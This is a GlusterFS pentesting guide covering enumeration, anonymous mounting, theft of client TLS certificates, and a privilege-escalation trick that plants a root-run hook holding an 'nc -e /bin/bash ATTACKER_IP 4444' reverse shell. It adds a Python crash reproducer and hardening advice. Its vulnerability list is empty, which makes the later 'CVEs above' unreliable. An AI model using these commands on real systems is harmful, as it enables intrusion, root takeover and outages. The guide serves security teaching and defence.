24007-24008-24009-49152 - Pentesting GlusterFS

Reading time: 5 minutes

Basic Information

GlusterFS is a distributed file system that combines storage from multiple servers into one unified namespace. The management daemon (glusterd) listens by default on 24007/TCP and instructs data-plane bricks that start at 49152/TCP (one port per brick, incrementing). Versions prior to 9.x used 24008–24009/TCP for brick transport, so you will still encounter those ports in legacy clusters.

PORT      STATE  SERVICE        VERSION
24007/tcp open   glusterd       GlusterFS (RPC)
49152/tcp open   gluster-brick  SSL (TLS optional)

Tip: 24007 answers RPC calls even when the storage-only nodes do not export any volume; therefore the service is a reliable pivot target inside large infrastructures.

Enumeration

Install the client utilities on your attacking box:

sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu

1. Peer discovery & health

# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status

2. Volume reconnaissance

# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all

3. Mount without privileges

sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster

If mounting fails, check /var/log/glusterfs/<vol_name>-<uid>.log on the client side. Common issues are:

• TLS enforcement (option transport.socket.ssl on)
• Address based access control (option auth.allow <cidr>)

Certificate troubleshooting

Steal the following files from any authorised client node and place them in /etc/ssl/ (or the directory shown in the error log):

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Known Vulnerabilities (2022-2025)

Always check gluster --version on every node; heterogeneous clusters are common after partial upgrades.

Exploiting gluster_shared_storage (Privilege Escalation)

Even in recent versions many administrators leave the special gluster_shared_storage volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with root on every node.

# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root

If hooks/1/ is not present, look for /ss_bricks/ – the exact path may vary with the major version.

Denial-of-Service PoC (CVE-2023-26253)

#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
    s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
    s.send(p.get_buffer())

Running the script crashes glusterfsd < 11.0.

Hardening & Detection

• Upgrade – current LTS is 11.1 (July 2025). All CVEs above are fixed.

• Enable TLS for every brick:

  gluster volume set <vol> transport.socket.ssl on
  gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
  

• Restrict clients with CIDR lists:

  gluster volume set <vol> auth.allow 10.0.0.0/24
  

• Expose management port 24007 only on a private VLAN or through SSH tunnels.

• Watch logs: tail -f /var/log/glusterfs/glusterd.log and configure audit-log feature (volume set <vol> features.audit-log on).

References

• GlusterFS security advisories
• CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash